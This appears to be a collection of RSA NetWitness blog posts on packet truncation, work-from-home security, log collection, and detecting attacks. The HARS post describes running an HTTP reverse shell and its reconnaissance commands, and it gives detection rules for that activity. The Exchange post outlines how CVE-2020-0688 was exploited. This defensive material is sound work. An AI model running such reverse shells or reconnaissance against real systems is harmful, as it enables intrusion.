Skip navigation
All Places > Products > RSA NetWitness Platform > Blog
1 2 3 Previous Next

RSA NetWitness Platform

581 posts

The ability to capture network events while keeping only the header portion and truncating the payload has been available for quite some time. This has always been a great option when the lack of analytical value of the raw data (e.g. the session payload) does not justify paying for the storage cost incurred to keep it. Some typical examples being saving database transfers of your backup files or data that is encrypted that you are unable to decipher into clear text.

 

In RSA NetWitness Platform 11.1 we added some additional options to increase the flexibility of when the truncation is applied to an event.

 

  • The first new option allows for the headers along with any Secure Sockets Layer (SSL) certificate exchange to be captured prior to truncating the remaining portion of the payload. This allows for analysis like TLS certificate hashing and JA3 & JA3S fingerprints to be generated while still removing the remaining payload to save on storage space.
  • The second option allows for the administrator to choose a custom boundary, based on how many bytes into the event raw data, before truncating the payload. Any bytes prior to the boundary are saved as part of the event and anything after that boundary is not stored.

 

The administrative interface shown below is where an admin can modify the truncation options on application rules per network decoder.

 

Administration of network decoder application rule truncation options

1       Introduction

The efforts of people around the globe have suddenly forced many workers to stay at home. For a significant portion of these workers that also means working remotely either for the first time, or at least more often than their normal telecommuting schedule. As a result of this necessity, many organizations may be forced to implement new remote technologies or significantly expand their current capacities for remote users. This added capability can present a significant security risk if not implemented correctly. Furthermore, malicious actors never pass up the opportunity to capitalize on current affairs. The RSA Incident Response Team has years of experience responding to Targeted Attacks and Advanced Threat Actors while assisting our clients with improving their overall security posture. The members of our team are either working with our customers on-site or supporting them from home. Our team has frequently assisted clients remotely, providing us with extensive experience in operating a secure remote team. Given the increasing threat landscape,  we are sharing some essential tips and suggestions on how organizations can improve their security posture, as well as how their remote workforce can keep themselves secure by following some best practices.

2       Tips for Users that are Working from Home

During this time many workers will be shifting from the office life to a work from home life that is unfamiliar to most of them. Many workers will be experiencing this reality for the first time, while for others it will be the first time this has been an everyday occurrence. In addition to the recommendations provided on the RSA blog (https://www.rsa.com/en-us/blog/2020-03/cyber-resiliency-begins-at-home), the RSA IR team is providing some additional details and best practices that users can utilize to help keep themselves secure while working from home.  Additionally, the RSA IR team has published a blog with tips that organizations can use to help improve their security posture (RSA IR - Best Practices for Organizations (A Starting Point)).

2.1      Use Provided Corporate Hardware

Now that you have shifted to working from home you will still need to ensure all work-related tasks are completed using your organization's provided laptop, if available. Using the work laptop allows the user to still be covered by the organization's security protections. It also helps the user with accidental disclosure of sensitive work data if that information is being stored on a personally owned machine. Some organizations have a bring-your-own-device (BYOD) policy.  In those cases, RSA recommends following your companies normal policy for remote computing.

2.2      Passwords

The passwords used for all corporate logins should comply with your organization's password policy.  However, RSA recommends use of a Password Manager to increase your security. Password managers (such as LastPass, Password Safe, Dashlane, 1Password, Apple Keychain, among other reputable password managers) allow you to randomly generate a secure and unique password for each login and store them within a database. This allows you to comply with corporate security policies without having to remember each individual password (or worse, reusing the same password). The implication of reusing passwords is that if an account's password is compromised in one location, then all other instances that have the same password are also compromised.  We will also be discussing multi factor authentication next; suffice to say that we recommend that multi factor authentication be enabled for access to your password manager for increased security.

Several password managers can be found at the below link:

NOTE: Password managers will require users to remember a single master password in order to access the others. It should be complex and not easily guessable. We recommended that you adopt the concept of passphrases rather than passwords. A passphrase can be a sentence or a combination of words that have some meaning to you. For example, a passphrase could be: “I need to be on vacation now!” or “Correct Horse Battery Staple” (reference: xkcd: Password Strength ) One example of a passphrase generator is https://xkpasswd.net/

2.2.1    Default Passwords

Many devices require a username and password to log in for initial or further configuration.  Often these devices (such as home routers, WIFI access points, cable modems and other Internet devices) come equipped with default passwords (such as admin or password).  RSA recommends that all default passwords be changed to secure unique passwords, especially for devices that connect directly to the Internet.

2.3        Multi Factor Authentication (Also Known as Two Factor Authentication)

Using multi factor authentication (MFA) for all remote access, for systems hosting sensitive data, and for systems performing administrative functions within the organization is strongly recommended. Multi factor authentication, (which is an evolution of two factor authentication (2FA)), enhances security by requiring that a user present multiple pieces of information to authenticate themselves. Credentials typically fall into one of three categories: something you know (like a password or PIN), something you have (like a smart card or token), or something you are (like your fingerprint or Iris scan). Credentials must come from two different categories in order to be classified as multi-factor. Applications that are sensitive to the organization such as your password manager, customer databases, administrative tools, etc. should all have multi factor authentication enabled on them.

 

2.4      Follow Your Company's IT and Security Policies

Organizations have established IT and security policies to protect all employees as well as the organization itself.  Just because you are not in the office does not mean that you still should not follow these policies. Security policies surrounding the way you handle data, communications, installed applications, and things you can do on your laptop should all be followed. Company provided computers should not be treated the same as personal devices. This may include disallowing your family from using the company provided computer.

2.5      Allow Updates and Patching to Take Place.

If your organization has a patch management program in place users should allow these processes to function as they normally would when they are in the office. These update procedures will at times require a reboot so ensure your machine is online, connected to the corporate VPN (if available), and allow it to reboot when it asks. Do not skip patches as they are released by your organization's IT department so that your machine is not put at risk of being compromised. 

2.5.1    Update Personal Devices

In addition to allowing your corporate system to update, personal assets should be updated as well. It is easy to ignore security updates for your systems, devices, or applications by simply clicking “update later”. However, repeatedly delaying these updates can lead to serious vulnerability issues. Updates should be performed for your personal operating systems (such as Windows or MacOS for example),  web browsers (such as Chrome, Firefox, Internet Explorer or Edge), tablets (such as iPad, Kindle, or Android), smartphones (such as iPhone or Android), and any other device that requires updates.

2.6      Phishing / Scams / Link Safety

Phishing is an attempt to trick a user into believing that the email message is something that they need, want, or are interested in. Phishing scams typically revolve around current events of the world or common life events (such as shipping related to online orders, among others). The attackers know that the subject and content of the email will trigger either fear or intrigue on the recipient. This emotion will most likely cause the recipient to click a link within the email or open its attachment. The link will likely download a malicious application or present the user with a fake login page that attempts to harvest credentials for sites such as your bank, email, social media, online shopping, gaming or other important credentials.  This can result in the loss of access, fraud, or abuse of these accounts if the user proceeds to divulge this information.

If you are unfamiliar with what phishing looks like or some of the common tactics used for social engineering, we highly recommend taking the quiz linked below to improve your skills for spotting phishing attempts:

2.7      WIFI Security

RSA recommends encrypting home wireless networks with WIFI Protected Access (WPA). There are several versions (WPA, WPA2 & WPA3) with WPA3 being the current strongest. RSA does not recommend using Wired Equivalent Protocol (WEP) or unsecured wireless Internet.

2.8      Security Training

If your company offers security training, RSA recommends that you take (or retake if it has been a while) the offered training as you are potentially at a higher risk now that you are outside the office. We understand that these trainings are not always the most exciting learning experiences, however they do help to reinforce good security behavior and can act as a refresher for things you may already know. One good resource to start is the SANS Security Awareness Work-from-Home Kit (https://www.sans.org/security-awareness-training/sans-security-awareness-work-home-deployment-kit)

2.9      Improve Your Household's Internet Safety

All the devices on your local network are linked to each other in one way or another. It is therefore important to ensure that all members of your household are kept safe and do not infect you by proxy. A great way of ensuring your family's internet safety on the internet is by using Microsoft family:

2.10  Non-Security Tips for Working from Home

2.10.1  A Second Monitor

A second monitor can increase your productivity, improve workflow and generally provide an improved experience while working.  Many organizations are offering to let employees borrow work resources such as monitors for use during this period of working from home. Check if your company is providing something similar.

2.10.2  A Comfortable and Supportive Chair

Since you will no doubt be spending an increased amount of time in front of your computer working, you will also likely be spending an increased amount of time in your chair.  Having a comfortable and supportive chair can help with posture and ergonomics while working from home.

2.10.3  Consider a Standing Desk or Standing Desk Converter

For many people sitting all day is not ideal. To help combat this consider using a standing desk or a standing desk converter that allows a home user to decide if they want to sit or stand at will. If you’re not able to utilize a standing desk, then be sure to take breaks where you are able to stand up and stretch.

3      Conclusion

In these uncertain times, we hope that this advice will help organizations and users stay connected and stay secure. Watch out for more posts and advice from across the RSA organization, and let us know what you're doing in the comments below.

1       Introduction

The efforts of people around the globe have suddenly forced many workers to stay at home. For a significant portion of these workers that also means working remotely either for the first time, or at least more often than their normal telecommuting schedule. As a result of this necessity, many organizations may be forced to implement new remote technologies or significantly expand their current capacities for remote users. This added capability can present a significant security risk if not implemented correctly. Furthermore, malicious actors never pass up the opportunity to capitalize on current affairs. The RSA Incident Response Team has years of experience responding to Targeted Attacks and Advanced Threat Actors while assisting our clients with improving their overall security posture. The members of our team are either working with our customers on-site or supporting them from home. Our team has frequently assisted clients remotely, providing us with extensive experience in operating a secure remote team. Given the increasing threat landscape,  we are sharing some essential tips and suggestions on how organizations can improve their security posture, as well as how their remote workforce can keep themselves secure by following some best practices.

2       Tips for Organizations (A Starting Point)

While there are many steps organizations can take to better protect themselves and their users, the RSA IR team is sharing some essential tips and suggestions that we consider to be a good starting point. However, these are by no means a complete list.  Each organization should adjust the below recommendations according to the organization’s security posture, and risk profile and acceptance.

Many vendors are offering emergency capacity extensions or trials of their products in this time of unprecedented social change.  Check with your vendors to see if they have any such offers in place for technology that your organization does not already have implemented as it pertains to the recommendations listed below. For a strategic approach, take a look at the post from our colleagues on the Advanced Cyber Defense (ACD) team Work From Home - The Paradigm Shift in Cyber Defense.

2.1      What Organizations Can Do for Their Users

2.1.1    VPN

While it may be tempting and seem like an easy option to just make resources available online via services like RDP, this is generally not recommended. Threat actors love searching for vulnerable servers that are connected to the internet regardless of the port used. Search engines like Shodan are showing an increase in the number of servers exposing RDP directly to the internet (https://blog.shodan.io/trends-in-internet-exposure/ ). Open RDP servers are regularly used to infect organizations with Ransomware and other malware (Two weeks after Microsoft warned of Windows RDP worms, a million internet-facing boxes still vulnerable • The Register ). RSA strongly discourages organizations from exposing RDP services directly to the internet.

Organizations should utilize VPN (or VPN alternative) technologies for employee remote access. RSA IR has the following tips regarding VPN usage.

  • Ensure Licensing counts can support the increased number of remote workers.
  • Ensure that the VPN devices can handle the increased number of simultaneous connections and throughput.
  • For strong security, RSA recommends that the VPN be Always-On if possible. An Always-On VPN requires the system to be connected to the VPN whenever an authorized client is connected to the internet. If bandwidth, simultaneous connection count, or bring-your-own-device (BYOD) is of concern, this suggestion can be re-prioritized.
  • All traffic should be tunneled over the VPN (No Split Tunneling), thus enabling the same network visibility and controls as if users were in office. If bandwidth availability or bring-your-own-device (BYOD) is of concern to the organization, this recommendation can be re-prioritized.
  • Investigate VPN alternatives for certain users. Alternative remote access solutions also exist such as, Virtual Desktops Infrastructure (VDI), Cloud Infrastructure, Software as a Service (SaaS), and others.

2.1.2    Multi Factor Authentication (Also Known as Two Factor Authentication) For All Remote Access

All remote access (including VPN, VDI, Cloud, Office365, SaaS, etc.) should be required to utilize Multi Factor Authentication. Multi Factor Authentication, which is an evolution of Two Factor Authentication (2FA), enhances security by requiring that a user present multiple pieces of information for authentication. Credentials typically fall into one of three categories: something you know (like a password or PIN), something you have (like a smart card or token), or something you are (like your fingerprint). Credentials must come from two different categories in order to be classified as multi-factor. As mentioned, check with your vendors to see if they are offering any assistance with surge capacity or new solutions.

2.1.3    User Education

RSA generally recommends that all staff using computer resources within a company complete annual security training. However, during this time when more users are working remotely, RSA recommends that organizations hold a special organization-wide user education session on password safety, phishing attacks, IT security policies, as well as covering how to report issues to the IT and Security Teams. If you’re looking for a place to start, see our other blog post for tips for users that are working from home (RSA IR - Recommendations for Users Working from Home).

2.2      What Organizations Can Do for Themselves

2.2.1    Updates and Patching

RSA consistently finds out-of-date and out-of-support Operating Systems and software running in client environments. Older software often has public vulnerabilities and exploits that are freely available online and are often targeted by commodity malware as well as targeted attackers. RSA strongly recommends that any core software be aggressively updated on a regular basis, especially if a vulnerability for a particular application is publicly announced. Exploiting vulnerable software is one of the easiest ways for an attacker to find their way into the enterprise. At a minimum organizations should look to:

  • Update and Patch all external facing systems, servers and applications (including web applications or frameworks).
  • Update and Patch all Critical Systems internal or external.

2.2.2    Web Application Firewall

If not already deployed, RSA recommends implementing a Web Application Firewall (WAF) to better protect Internet facing web applications. A WAF solution can provide a reduction in the attack surface of web applications and in some cases, of the operating system itself. It is important to note that simply installing a WAF solution will not immediately secure all the web applications as all WAF solutions, regardless of vendor, need to be tuned for the specific applications and environments they are being used to protect.

If a WAF is already deployed, RSA recommends that organizations verify that it is in front of not just the business-critical web applications, but also all other external web-facing assets.

2.2.3    Leverage Freely Available Threat Intelligence Feeds

As notices have been released about increased attacker activity related to recent attacks and fraud (https://www.ic3.gov/media/2020/200320.aspx), many threat intelligence vendors are offering freely available intelligence of current threats and scams. Here are some of the companies offering related intelligence feeds for free, as well as providing some additional tools for analysts.

2.2.4    Endpoint Detection and Response (EDR)

Endpoint Detection and Response (EDR) is especially important to organizations that, for various reasons, are unable to enable an Always-On VPN. 

If your organization already has an Endpoint Detection and Response (EDR) solution, ensure that it is deployed to all remote users.  Since endpoints may not be sending all their traffic internally to allow for network visibility, EDR tools can help gain visibility of endpoints operating outside the internal network environment. Organizations need to ensure that data collected by the EDR tool can be transmitted to the central EDR server either continuously or while connected to the VPN. Organizations must also ensure that their licensing limits, as well as server capacity, support a potential increase in the number of endpoints.  Speak to your security vendors to see if they provide surge or Business Continuity increases during this time.

If your organization does not currently have an EDR tool, then consider deploying one.  EDR solutions now offer more than just detection and blacklisting of malware; but also, have built-in forensic capabilities such as acquiring remote system files, memory images, behavior analysis, and false positive management via whitelisting. This means that organizations can detect, respond and block malicious activity much quicker and without the need to create a full host forensic image for investigation. Additionally, once a Behavior of Compromise (BOC) is identified, the EDR solution should be able to detect where else in the enterprise that indicator has been observed. Speak to your trusted security vendors and see if they are offering any on a trial basis.

2.2.5    Remote Collaboration

If your organization does not already have a policy for remote collaboration tools (such as screen share), consider adopting one for remote users. At the very least, RSA suggests having a recommendation for users so that they do not seek out their own solutions.  Some examples include Zoom, WebEx, GoToMeeting, Microsoft Teams, as well as others.

3      Conclusion

In these uncertain times, we hope that this advice will help organizations and users stay connected and stay secure. Watch out for more posts and advice from across the RSA organization, and let us know what you're doing in the comments below.

I have recently been posting a number of blogs regarding the usage of the RSA NeWitness Platform to detect attackers within your environment. As the list of the blogs grow, it is becoming increasingly difficult to navigate through them easily. In order to combat this, this blog post will contain references to all other blog posts in the Profiling Attackers Series, and will be updated when new posts are made.

 

 

 

 

 

 

 

Special thanks to Rui Ataide for his support and guidance for these posts.

I recently reviewed HTTP Asynchronous Reverse Shell (HARS) for The C2 Matrix, which should be posted soon! They also have a Google Docs spreadsheet here: C2Matrix - Google Sheets. I’ve been following them for awhile and have tried to map as may of the frameworks as possible from a defensive perspective. This blog post will therefore cover just that, how to use RSA NetWitness to detect HARS.

 

The Attack

After editing the configuration files, we can compile the executable to run on the victim endpoint. After executing the binary we get the default error message, which is configurable, but we left it with default settings:

 

The error message is a ruse and the connection is still made back to the C2 server where we see the successful connection from our victim endpoint:

 

It drops us by default into a prompt where we can begin to execute our commands, such as whoamiquser, etc:

 

Detection Using NetWitness Network

By default HARS uses SSL, so to see the underlying HTTP traffic, we used a MITM proxy to intercept the communication; it is highly advisable to introduce SSL interception into your own envrionment. Within this post, we will also cover the anomalies with the communication over SSL.

 

HTTP

An interesting meta value generated for the HARS traffic is, http invalid cookie - this meta value looks for HTTP cookies that do not follow RFC 6265:

 

Drilling into the Events view for these sessions before reconstructing them, we can observe that there is a beacon type pattern to the connections with some jitter, and also a low variance in the payload for each request - this indicates that this is a more mechanical type check-in behaviour:

 

Reconstructing the events and looking at the cookie for the requests, we can see what looks like Base64 data:

 

 

Using the built-in Base64 decoding, we can see that this decodes to HELLO. While this is not indicative of malicious activity, this is still a malformed cookie and a rather strange value:

 

From here, we can continue to go through the traffic and decode the values supplied within the cookie header. The next few cookies contain the text QVNL, which returns ASK when Base64 decoded:

 

Eventually we come across a cookie with a Base64 encoded version of what looks like the ouput from a whoami command:

 

As well as one that contains the output from a quser command. Both these look rather suspicious and this is information that normally shouldn't be sent to a remote host, especially in this manner as a cookie value:

 

Looking through the request prior to the one that returns the output of quser, and sifting though the payload, there is a Base64 encoded quser command within it:

 

This C2 framework disguises its commands within legitimate looking pages in an attempt to evade detection by analysts, but is easily detected with NetWitness using a single meta value, http invalid cookie.

NOTE: It is important to remember that many applications abuse the HTTP protocol and do not follow RFC's, it is therefore possible for legitimate traffic to have inavlid cookies, it is down to the defender to determine whether the activity is malicious or not, but NetWitness points you to these anomalies and makes it easier to focus on traffic of interest.

 

This C2 is highly malleable and therefore the following application rule would only pick up on its default configuration, however, attackers tend to be lazy and leave many of the default settings for these tools. This would allow us to easily create an application rule to detect this behaviour:

cookie = 'QVNL','SEVMTE8='

 

In order for the application rule to work, you would need to register the cookie HTTP header. This involves using the customHeaders() function within the HTTP_lua_options file as described on the community:

 

One of our previous posts also covered registering the cookie HTTP header into a meta key and can be found on the community:

 

 

SSL

As previously stated, HARS uses SSL to communicate by default. When HARS initially connects back to the C2 from the victim endpoint, it attempts to blend in with typical traffic to www[.]bing[.]com. The below screenshot shows the malicious traffic (on the left), and the legitimate traffic to Bing (on the right). Playing spot the difference, we can see a few anomalies as highlighted below:

 

This allows us to create logic to detect possible HARS usage with the following application rule:

service = 443 && alias.host='www.bing.com' && ssl.ca='microsoft corporation' && ssl.subject='microsoft corporation'

 

And we can also create an application rule to look for anomalous Bing certificates, this would, however, be lower fidelity in order to detect a broader range of suspicious cases to aid in threat hunting:

service = 443 && alias.host = 'www.bing.com' && not(alias.host='www.bing.com' && ssl.ca='microsoft corporation','baltimore' && ssl.subject='www.bing.com')

 

Detection Using NetWitness Endpoint

HARS uses PowerShell to execute the commands on the victim endpoint, but does not use any form of obfuscation. Therefore in NetWitness Endpoint, we can see multiple hits under the Behaviours of Compromise meta key for the reconaissance commands executed, quser, whoami, and tasklist:

 

Drilling into those meta values, we can see an executable named, hars.exe, running out of a suspect directory and executing reconaissance type commands:

 

Pivoting on the filename, hars.exe, (filename.src = 'hars.exe'), which really could be any other name, but would still be launching your commands, we can see all the events from this suspect executable, such as the commands it executed under the Source Parameter meta key:

 

After every command executed, HARS adds the following, echo flag_end. We can use this to our advantage to create an application rule to detect its behaviour:

category = 'console event' && param.src ends 'echo flag_end'

 

Another neat indicator comes under the Context meta key, here we can see four interesting meta values associated with, hars.exe - console.remote, network.ipv4, network.nonroutable, and network.outgoing - these meta values tell us that this executable is making an outbound network connection and running console commands:

 

Drilling into the Events view for the network meta values, we can see where the executable is connecting to:

 

And drilling into the console.remote meta value, we can see the commands that were executed:

 

So from a defenders perspective, it could be a good idea to use the filter, context = 'console.remote' - and look for suspicious executables:

 

Conclusion

Not all C2 frameworks use advanced methods of obfuscation or encryption, some rely on confusing analysts by trying to blend in with normal traffic by mimicking legitimate web sites. It is important as a defender to spot these anomalies and fully analyse the traffic, even if it at first glance appears to be normal, and remember, the attacker would probably think none of this really matters as the attack is over SSL and this data would not be visible to analysts, which is where having SSL interception is a great advantage for analysts, it really catches attackers out.

INTRODUCTION

By now, you may have already started to work from home instead of your usual workplace, like many of your co-workers and peers. As the situation continues to evolve, there is a rapidly increasing trend for organisations to shift their employees from office to work from home. In addition to the recommendations provided in the following RSA blogs: Cyber Resiliency Begins at Home, RSA IR - Best Practices for Organizations (A Starting Point), and RSA IR - Recommendations for Users Working from Home, in this post, we will be going into further details to examine the potential challenges that cybersecurity professionals are contending with as organizations around the globe start to transit more employees from offices to work-from-home arrangements and conducting meetings through virtual means; this transformation in how we work and conduct our businesses will inevitably have an impact on our threat environment. We will discuss in the subsequent paragraphs on what is the paradigm shift in our threat landscape and what should we do to continue to stay effective in safeguarding our assets from the emerging cyber threats.

 

THE PROBLEM

There are 2 key problems that we see here which we will break it down in the following paragraphs:

 

Problem #1

The cyber defense architecture for many of the organizations today are designed based on the assumption that most of the daily BAU activities are performed on-premise. With the sudden need to allow a good number of employees to work-from-home, it means that many of the activities would now have to be performed remotely. The challenges in provisioning or scaling of the necessary IT infrastructure to support these sudden changes aside, this also gives rise to a shift in the threat landscape, where the existing cyber defense measures that have been working in the past, may no longer be effective now.

 

Problem #2

There is an increasing trend that attackers are preying on the psychology of human beings by coming up with new attacks related to the latest trending news topic or specifically targeting work-from-home employees through the remote meeting applications that they use, for example:

  • Phishing Emails and Malware Attachments disguised as legitimate meeting invites and installers from popular remote meeting applications.
  • Malicious mobile applications promising to be the most up-to-date outlet for tracking the latest breaking news and developments.
  • Domain names that are similar to popular remote meeting platforms.

 

Combining both the above-mentioned problems and coupled with the tendency that as humans we naturally feel more comfortable in our home setting as compared to offices, there is an increased likelihood where some of us may be letting our guards down when it comes to spotting Phishing Emails, Malicious attachments and applications, as well as malicious websites that come knocking on our door at the least expected timing. All these can lead to an exponential increase in the level of cybersecurity risks faced by your organization and when there is a sudden surge in the number of cybersecurity breaches, does your organization have the capacity to handle them?   

 

WHAT CAN YOU DO?

Here, we look at what you can possibly explore as part of the Cybersecurity Team in your organization from the perspectives of People, Process and Technology to address the above mentioned issues.

 

People

Virtual Cyber Awareness Briefings. With increasingly more employees working from home, you can no longer conduct the usual quarterly cyber awareness briefings in traditional classroom settings. Instead of halting these briefings, why not take them virtual in the form of webinars for all employees who are working remotely. There are many platforms which can allow you to do so, such as WebEx, Zoom, Adobe Connect etc. You can also record the sessions and make them available offline for employees who are not able to join the live sessions.

 

EDMs. Apart from virtual awareness briefings, you should also look to increase the frequency of Electronic Direct Mails (EDMs) to remind the employees on the necessary cyber hygiene that they should continue to practice even when working from home.

 

Reward-based Quizzes. Besides briefings and EDMs, you can also take one step further to implement regular reward-based quizzes related to different cyber hygiene topics, in order to encourage and engage your employees in an interactive manner.  

 

Phishing Tests. Lastly, to assess if the above initiatives are effective, the best way is to test it out by implementing a Phishing Campaign on your internal employees. This could include regular phishing tests to your employees to assess their alertness in spotting such threats. You should also look to send out such emails in batches and in a random manner across different departments and regions such that the employees are not able to “cheat” the test by sharing information with their peers on such ongoing tests.

For the above initiatives, you could potentially include phishing topics that are related to the latest trending news or emails disguised as coming from legitimate remote meeting applications (e.g. meeting invites) in order to mimic the latest threats that the organization is facing.

 

Process

There are a couple of key processes which would require review and revision, to ensure that they are relevant to the work-from-home model. For example: 

 

Access Control. With the increasing number of employees working from home, you need to review the existing access control related processes, such as the requirements for an employee to qualify for remote access. For example, your Access Control List (ACL) for remote access could be previously role-based, but this may no longer applies if you are in the situation where practically most of the employees across different roles may require remote access. With this sudden growth of remote access employees, are the existing access control provisioning and review processes still practical and relevant? Of course, there are many other issues to consider in this area, which will be too long to be discussed in this post.    

 

Incident Reporting. With the work-from-home model, you need to ensure that all employees working remotely are familiar with the incident reporting mechanisms in the event of any suspicious happenings. For example, they need to know what is the reporting hotline and email address which they can reach out to on a 24/7 basis, as well as other automated reporting mechanisms such as having a tool to report on phishing emails in their outlook application.

 

Cybersecurity Champions. Apart from the regular Incident Reporting mechanisms, you should also consider appointing representatives across different departments or teams as “Cybersecurity Champions”, who are basically regular employees (i.e. not part of the Cybersecurity Team) but are more proficient in the area of the relevant security processes in the organization. This initiative will allow employees to reach out to someone whom they are familiar with if they are unsure of any suspicious happenings or if they would like to have a quick refresher on what are the best practices in cyber hygiene.  

 

Incident Response (IR). Are your existing IR processes robust enough and tailored to include the remote working model practiced by most of your employees right now? You should look to review your existing processes covering the following phases and ensure that they remain relevant to the latest Business and Operating models of your organization:

  • Triage
  • Investigation
  • Containment
  • Eradication
  • Remediation
  • After Action Review

 

Technology

Access Control. In terms of access control provisioning for remote working, you should consider what is the best approach to implement multi-factor authentication in a manner where you can scale up/ down the infrastructure quickly in a cost-effective manner. The options could include the following, depending on your existing set-up, requirements and budget:

  • Hardware token
  • Software token
  • SMS/ Email OTP

 

For operations on critical servers that need to be performed remotely, there may be a need to differentiate them from the regular 2FA that is provisioned for normal remote access, by having a further step-up in the authentication process.

 

Monitoring and Detection. With the shift to the remote working model, there is a need to put more focus on the SIEM Use Cases related to VPN and remote access so that you can pick up such threats early. These are some examples of the Use Cases that may be relevant to the remote working model:

  • Detecting VPN access from suspicious locations
  • Simultaneous VPN Geo login from a single user
  • Suspicious remote logon hours from critical admin accounts
  • Remote admin session reconnected from a different workstation
  • Mass phishing attempts targeting your organization
  • and many more..

 

Endpoint. There are many different layers of endpoint controls which become especially important for the work-from-home model, such as the following:

  • Hard Disk Encryption for all PCs, so that the corporate data remains protected even if they are misplaced
  • Mobile Device Management which allows IT Department to manage the corporate information stored in mobile devices and allow the corporate information to be securely removed remotely if they are misplaced.
  • Endpoint Detection and Response to detect advanced threats in your endpoint devices, which may not have been picked up by traditional Anti-Malware solutions.
  • Data Labelling Enforcement and Data Loss Prevention (DLP) – Enforce data labeling for all documents and emails created or modified, and implement DLP to detect or prevent unauthorized movement of sensitive data.
  • Application Whitelisting as a second layer of defense against unauthorized installation of malicious applications masqueraded as genuine ones into the corporate PC.  

 

Network and Servers. To ensure that you are not opening up the attack surface of your network and assets given the increased number of remote connections, you should consider the following:

  • VPN provisioning for all remote connections.
  • Network Access Control to disallow remote connections from PCs to the corporate network if the Anti-Virus definitions or patching status of the PCs are not up-to-date.
  • Jump Server. Consider placing a Jump Server in front of critical servers to serve as an added layer of defense. This is especially important if the servers are critical but need to be accessed remotely.

 

Email. For corporate emailing, you could look to implement a Phishing Email Reporting Tool which your employees could easily report a phishing email to the Cybersecurity Team without having to manually write an email or call the reporting hotline. Also, you should look to implement a Labelling mechanism to automatically label all emails received from external Domains as “External”, as this has been proven to be effective in raising the alertness of employees when they receive any external emails, which could potentially be a phishing email or contain malicious artefacts.

 

Threat Intel and Hunting. A common saying goes “Know thyself and thy adversary to win a hundred battles”, this is very true and applies in the realm of Cyber Defense as well. By having timely intel that are relevant to your threat landscape, it helps you perform sense making and correlation of threats in your environment more effectively and allows you to put in the necessary measures early to look out for such threats. You should also look to conduct regular pro-active threat hunting sessions by trained specialists (i.e. Threat Hunters) to discover low-lying and advanced attacks which could otherwise may not have been picked up by your regular controls.

 

THE NEED FOR SPEED

Given the need to transition quickly,  securely and efficiently to a remote working model for your organization, you will need to be able to make the relevant changes to your existing Cyber Defense Architecture (in the areas of People, Process and Technology) within a short amount of time, in order to ensure that the level of cybersecurity risk which your organization could be potentially exposed to, continues to remain within an acceptable level. As such, it may be worthwhile to consider engaging external professionals for tasks which could be performed remotely, for example:

  • Perform a gap analysis on your existing processes (e.g. Incident Response and Reporting Processes, Access Provisioning Processes) through documents review and remote workshops that are focused on the remote working model and provide practical recommendations on what you can quickly implement to close the gaps.
  • Develop Use Cases that are tailored to the remote working model to ensure that the detection remains effective against the latest threat landscape.
  • Subscribe to a temporary Managed Security Service to outsource your Level 1 monitoring to an external party if you anticipate a surge in the number of alerts in the SOC during a particular period, so that you can free up the time of your internal SOC team to focus on investigation and incident response.
  • Subscribe to an IR Retainer service to implement a surge resourcing model, ensuring that you have sufficiently trained expert resources when needed most, to assist the internal IR Team in times of complex incidents which may require highly complex work such as malware analysis and digital forensics.
  • Conduct threat hunting sessions to discover any low-lying threats which may have been present for some time in your environment.

 

CONCLUSION

To conclude, there is no one-size-fit-all solution but we hope that the above will provide you with some useful insights in planning for your Cyber Defense Architecture. 

The NetWitness 11.4 release included a number of features and enhancements for NetWitness Endpoint, one of which was the ability to collect flat file logs (https://community.rsa.com/docs/DOC-110149#Endpoint_Configuration), with the intent that this collection method would allow organizations to replace existing SFTP agents with the Endpoint Agent.

 

Flat file collection via the 11.4 Endpoint agent allows for a much easier management compared to the SFTP agent, in addition to the multitude of additional investigative and forensic benefits available with both the free version of the Endpoint agent and the advanced version (NetWitness Endpoint User Guide for NetWitness Platform 11.x - Table of Contents).

 

The 11.4 release included a number of OOTB, supported Flat File collection sources, with support for additional OOTB, as well as custom, sources planned for future releases.  However, because I am both impatient and willing to experiment in my lab where there are zero consequences if I break something, I decided to see whether I could port my existing, custom SFTP-based flat file collections to the new 11.4 Endpoint collection.

 

The process ended up being quite simple and easy.  Assuming you already have your Endpoint Server installed and configured, as well as custom flat file typespecs and parsers that you are using, all you need to do is:

  1. install an 11.4+ endpoint agent onto the host(s) that have the flat file logs
  2. ...then copy the custom typespec from the Log Decoder/Log Collector filesystem (/etc/netwitness/ng/logcollection/content/collection/file)
  3. ...to the Node0/Admin Server filesystem (/var/netwitness/source-server/content/collection/file)
    1. ...if your typespec does not already include a <defaults.filePath> element in the XML, go ahead and add one (you can modify the path later in the UI)
    2. ...for example: 
  4. ...after your typespec is copied (and modifed as necessary), restart the source-server on the Node0/Admin Server
  5. ...now open the NetWitness UI and navigate to Admin/Endpoint Sources and create a new (or modify an existing) Agent File Logs policy (more details and instructions on that here: Endpoint Config: About Endpoint Sources)
    1. ...find your custom Flat File log source in the dropdown and add it to the Endpoint Policy
    2. ...modify the Log File Path, if necessary:
    3. ...then simply publish your newly modified policy
  6. ...and once you have confirmed Collection via the Endpoint Agent, you can stop the SFTP agent on the log source (https://community.rsa.com/docs/DOC-101743#Replace)

 

And that's it.  Happy logging.

Abstract

 

In this blog I describe a recent intrusion that started with the exploit of CVE-2020-0688. Microsoft released a patch for this vulnerability on 11 February 2020. In order for this exploit to work, an authenticated account is needed to be able to make requests against the Exchange Control Panel (ECP). Some organizations may still have not patched for this vulnerability for various reasons, such as prolonged change request procedures. One false sense of "comfort" for delaying this patch for some organizations could be the fact that an authenticated account is needed to execute the exploit. However, harvesting a set of credentials from an organization is typically fairly easy, either via a credential harvesting email, or via a simple dictionary attack against the exchange server. Details on the technical aspects of this exploit have been widely described on various sites. So, in this blog I will briefly describe the exploit artifacts, and then jump into the actual activity that followed the exploit, including an interesting webshell that utilizes pipes for command execution. I will then describe how to decrypt the communication over this webshell. Finally, I will highlight some of the detection mechanisms that are native to the Netwitness Platform that will alert your organization to such activity.

 

Exchange Exploit - CVE-2020-0688

 

The first sign of the exploit started on 26 February 2020. The attacker leveraged the credentials of an account it had already compromised to authenticate to OWA. An attacker could acquire such accounts either by guessing passwords due to poor password policy, or by preceding the exploit with a credential harvesting attack. Once the at least one set of credentials has been acquired, the attacker can start to issue commands via the exploit against ECP. The IIS logs contain these commands, and they can be easily decoded via a two-step process: URL Decode -> Base64 Decode.

 

IIS log entry of exploit code

 

The following Cyberchef recipe helps us decode the highlighted exploit code:

https://gchq.github.io/CyberChef/#recipe=URL_Decode()From_Base64('A-Za-z0-9%2B/%3D',true)

 

The highlighted encoded data above decodes to the following where we see the attacker attempt to echo the string 'flogon' into a file named flogon2.js in one of the public facing Exchange folders:

 

Decoded exploit command

 

